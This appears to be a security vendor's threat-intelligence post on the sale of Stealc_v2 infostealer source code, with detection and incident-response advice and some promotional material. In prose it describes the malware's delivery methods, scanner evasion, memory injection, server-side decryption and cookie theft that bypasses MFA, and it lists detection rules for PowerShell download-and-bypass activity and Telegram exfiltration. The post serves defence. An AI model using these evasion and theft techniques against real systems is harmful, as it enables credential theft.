The alleged sale of the Stealc_v2 information-stealing malware source code on the exploit.in forum introduces major corporate security challenges. Featuring a PHP administration panel, customizable builders, and Telegram bot integrations, this leak enables rapid deployment of stealthy credential-harvesting campaigns.
Distributed via phishing, SEO-poisoned search results, trojanized software downloads, ClickFix, or weaponized 3D Blender assets.
Dropper executed via lightweight PowerShell scripts (e.g., lola.ps1) or MSI packages.
Binary size is heavily padded up to 1GB with junk data to bypass size limitations on automated security scanners.
Dynamically resolves NtAPI/WinAPI (VirtualAlloc, NtProtectVirtualMemory, NtWriteVirtualMemory) to inject shellcode.
Exfiltrates raw browser databases, master keys, and tokens to C2. Decryption is processed entirely server-side to bypass local app security.
If your team may be exposed to a similar threat, FemtoSec can help validate blast radius, prioritize remediation, and connect the issue to a practical security program.
A new malware variant known as ThePennyC2 has been identified in underground circles, designed to exfiltrate sensitive data from Chromium-based browsers.
June 25, 2026
A threat actor is selling the source code of the Predator 1.6 remote access trojan and file binder on the cybercrime forum Spear. This development lowers the technical barrier for deploying persistent backdoors, posing immediate security risks that demand behavioral EDR rules and path restrictions.
Threat actors are advertising GhostNet, a cross-platform malware targeting Windows, macOS, and Linux with features like HVNC, browser stealing, and reverse proxies. Learn how GhostNet operates, its step-by-step attack chain, and the precise detection and containment strategies needed to secure your enterprise.
Free exposure check
Dark Web Scanner
check dark web mentions, compromised account indicators, malware log signals, public breach exposure, and recent underground market activity for your domain.
The sale of the complete source code for the Stealc_v2 information-stealing malware on the exploit.in underground forum has triggered a significant shift in the digital threat environment. This listing, which includes the web administrative panel, the payload builders, and a custom Telegram bot generation utility, essentially commoditizes a highly effective credential-harvesting tool. By obtaining the raw source code, lower-tier threat actors can bypass the traditional Malware-as-a-Service subscription fees and deploy independent, highly customized infrastructure to target corporate environments globally. Originally designed under a subscription model by the developer known as plymouth, Stealc has been a persistent risk to corporate endpoints since its inception. The transition of this updated second-version codebase into an open-sale format means security teams must prepare for an immediate surge in customized variants and evasion techniques. As threat actors acquire the core code, they can easily adapt its evasion mechanisms, change network signatures, and target specific administrative and financial portals unique to high-value enterprises.
If an endpoint is confirmed to be compromised by Stealc_v2, immediate isolation is critical. Security administrators must disconnect the compromised workstation from the corporate network to prevent lateral movement. Simultaneously, they must terminate all active OAuth tokens, cloud service sessions, and single sign-on sessions associated with the user accounts on that device. Finally, enforce full password rotation for all personal and corporate applications that were stored or used on the compromised machine. To determine whether your enterprise assets have already been compromised and listed on underground markets, organizations must look outward. FemtoSec provides dedicated Dark Web Monitoring to continuously scan underground forums, channels, and logs for leaked corporate credentials.
The emergence of Stealc_v2 represents a deliberate technical shift in how modern infostealers manage exfiltrated data. In standard infostealers, raw browser database files are decrypted locally on the victim system before the extracted credentials are sent to the command and control server. Stealc_v2 changes this flow by exfiltrating the raw, encrypted browser databases, the associated session cookies, and the specific master keys directly to the centralized command and control server. By performing the decryption on the server-side, the malware avoids triggering local endpoint detection and response alerts that typically monitor runtime decryption operations. This technique also directly aims to bypass Google's App-Bound Encryption defenses, which restrict local decryption of browser-stored credentials to the original program context. Threat actors hosting their own administrative panels can now orchestrate massive decryption operations remotely, translating raw system logs into plain-text credentials without leaving a substantial footprint on the compromised host.
To defend enterprise networks against Stealc_v2, security teams must understand the complete, step-by-step attack lifecycle. The malware utilizes a modular delivery system combined with aggressive defense evasion mechanisms to establish a foothold and exfiltrate highly sensitive session data.
Initial compromise typically relies on high-fidelity social engineering, SEO poisoning, or compromised software distributions. Threat actors often distribute the malware via Trojanized Professional Software disguised as cracked versions of popular design and editing software packages. Another major vector includes weaponized 3D assets uploaded to public repositories that execute embedded scripts immediately upon opening. Additionally, web-based ClickFix attack paths are used to trick users into running PowerShell scripts disguised as mandatory browser updates.
Once a user executes the initial file, a lightweight downloader script is initiated. A common payload vector observed in these campaigns is a PowerShell wrapper designed to run with elevated execution policies. To evade automated sandbox analysis, the threat actors apply binary padding to the main Stealc_v2 executable. By inflating the size of the binary with junk bytes, the file size often exceeds 100MB or even 1GB. Because many traditional antivirus scanners bypass files over a certain size to conserve system resources, this simple technique frequently succeeds in slipping past perimeter defenses.
After bypassing the primary file scanners, the loader resolves critical Windows API functions dynamically. Using direct syscalls to bypass system monitoring APIs, the malware interacts directly with the kernel to allocate memory and inject its core payload. Standard APIs utilized during this phase include VirtualAlloc and NtProtectVirtualMemory to prepare memory regions for shellcode, NtWriteVirtualMemory to inject the decrypted payload into a legitimate system process, and CreateThread to execute the payload within the context of the target process.
Once memory injection is complete, the malware actively scans the user profile directory to locate and harvest credentials, cryptocurrency wallets, and communication histories. The primary targets include autofill data from over 20 Chromium and Gecko-based browsers, desktop session tokens for platforms like Telegram and Discord, and private keys from active cryptocurrency extensions. The malware also features a built-in module designed to capture full-screen screenshots across multiple active monitors, providing attackers with immediate visual context of the victim's workspace.
The harvested data is quickly compressed into an encrypted archive and prepared for exfiltration. In previous versions, exfiltration occurred exclusively via direct HTTP POST requests to customized web endpoints. With the inclusion of the Telegram bot builder in the Stealc_v2 source code leak, operators can now program the malware to send real-time notifications directly to their private Telegram channels. Whenever a user with high-privileged credentials or significant cryptocurrency assets is compromised, the operator receives an immediate, automated alert detailing the stolen data.
The proliferation of Stealc_v2 source code represents an acute threat to corporate identity management. Traditional multi-factor authentication systems often fall short when confronting modern session hijacking attacks. Because infostealers harvest active session cookies alongside standard username and password combinations, attackers can import these stolen cookies directly into their own browsers. This technique allows them to bypass the multi-factor authentication prompt entirely, as the target service recognizes the session as already validated. For organizations in the GCC region, safeguarding endpoints against these targeted campaigns is paramount. To evaluate your organization's resilience against these evasive memory injection techniques, conducting targeted Penetration Testing is highly recommended. These proactive assessments simulate real-world infostealer behaviors and loader patterns to ensure endpoint detection mechanisms are properly tuned.
Defending against Stealc_v2 requires a multi-layered security strategy focused on behavioral monitoring, application control, and proactive network threat hunting.
Security operations centers should implement specific detection logic to identify the distinctive behaviors associated with the loader and the payload. Teams should create endpoint rules that alert on unsigned executables exceeding 100MB in size, especially when launched from local folders. It is also critical to alert on any PowerShell processes executing with execution policy bypass parameters combined with download-string commands. Furthermore, configure Endpoint Detection and Response systems to flag processes that dynamically resolve sensitive virtual memory manipulation APIs outside of standard compiler behaviors.
Organizations should continuously monitor for outbound network connections directed at unusual PHP endpoints, particularly those containing randomized hexadecimal paths. Additionally, blocking outbound communication from corporate workstations to the Telegram Bot API is an effective containment step to prevent operators from receiving exfiltrated alerts.
